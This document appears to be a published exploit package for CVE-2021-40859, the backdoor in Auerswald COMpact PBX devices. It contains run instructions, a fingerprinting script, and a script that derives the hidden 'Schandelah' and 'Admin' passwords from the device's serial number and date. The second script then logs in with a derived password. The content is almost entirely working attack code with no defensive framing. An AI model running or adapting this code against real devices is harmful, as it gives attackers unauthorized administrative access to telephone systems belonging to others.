CVE-2021-40859 Auerswald COMpact 8.0B 后门漏洞利用

pip3 install requests lxml BeautifulSoup pandas 

python3 flagger.py http(s)://ip

python3 CVE-2021-40859.py ip:port

import sys
import requests
import logging
logging.basicConfig(level=logging.DEBUG)

# C0ded By @D0rkerDevil and @wabaf3t

target_in = sys.argv[1]

product = ['COMpact 4000', 'COMpact 5000(R)', 'COMpact 5200(R)', 'COMpact 5500R', 'COMmander 6000(R)(RX))', 'COMpact 3000 ISDN', 'COMpact 3000 analog', 'COMpact 3000 VoIP']

response = requests.get(target_in+'/about_state',verify=False,timeout=3)
tmp = response.json()
Schandelah = tmp['pbx'],tmp['version']
for i in product:
    if i in Schandelah:   
        print("\033[1;31m"+'''Auerswald COMpact Device Found - Product Name and Version+Build ->'''+"\033[0m", Schandelah)
        print("\033[1;31m"+'''Most Likely the target is Vulnerable , Please confirm with the exploit avilable here -> https://github.com/dorkerdevil/CVE-2021-40859/blob/main/CVE-2021-40859.py '''+"\033[0m")

import requests
import os
import json
import subprocess
import hashlib
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from bs4 import BeautifulSoup
import requests
import lxml.html as lh
import pandas as pd
import sys
from requests.auth import HTTPDigestAuth

print (''' Coded By '''+"\033[1;31m"+'''@D0rkerDevil @wabaf3t'''+"\033[0m")
print ('''Testing your PBX - Hold your Horses''')
try:
    import httplib
except ImportError:
    import http.client as httplib
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

target = sys.argv[1]
  
def jack_login(target,default_pass):
    try:
       # Making a get request
       #response = requests.get('http://'+target+'/tree',auth=HTTPDigestAuth('Schandelah', default_pass),timeout=3,verify=False,allow_redirects=True)
       httplib.HTTPConnection.debuglevel = 1


       response = requests.get('https://'+target+'/tree',auth=HTTPDigestAuth('Schandelah', default_pass),timeout=3,verify=False,allow_redirects=True)
       if response.status_code:
          print(response.status_code)
          return True
      
          
    except Exception as ex:
       print(ex)
       pass

def create_pass(target_hashval):
    try:
       answer = hashlib.md5(target_hashval.encode())
       return answer.hexdigest()
    except Exception as md5err:
      print(md5err)
      pass

def request_default(target_in):
    try:
       # Making a get request
       response = requests.get('https://'+target_in+'/about_state',verify=False,timeout=3)
       tmp = response.json()
       Schandelah = tmp['serial']+"r2d2"+tmp['date']
       Admin = tmp['serial']+"r2d2"+tmp['date']+"DE"
       poc_info = {}
       poc_info['target'] = 'https://'+target_in
       start = "Version "
       end = " - Build"
       version = (tmp['version'].split(start))[1].split(end)[0]
       vuln_test = version[0:3]
       poc_info['version'] = vuln_test
       poc_info['backdoor1'] = create_pass(Schandelah)
       poc_info['backdoor2'] = create_pass(Admin)
       poc_info['is_vuln'] = ""
       if float(vuln_test) <= float(8.0):
          poc_info['is_vuln'] = True
       else:
           poc_info['is_vuln'] = False
           
       return poc_info
    except Exception as ex:
      print(ex)
      pass
      
      
      
      


def main():     

   
    version_data = request_default(target)
    if version_data:

       r2d2 = str(version_data['backdoor1'][0:7])
       c3po = str(version_data['backdoor2'][0:7])
       
       print("Default Pass Generated fo backdoor user Schandelah :"+r2d2)
       print("Default Pass Generated fo backdoor user Admin :"+c3po)
       print(version_data)
       try:
           is_authed = jack_login(target,r2d2)
           if is_authed:
              print("Succesfully Logged in with Default pass")
           else:
              print("failed to auth")
          
       except Exception as ex:
         print(ex)
         pass
    
main()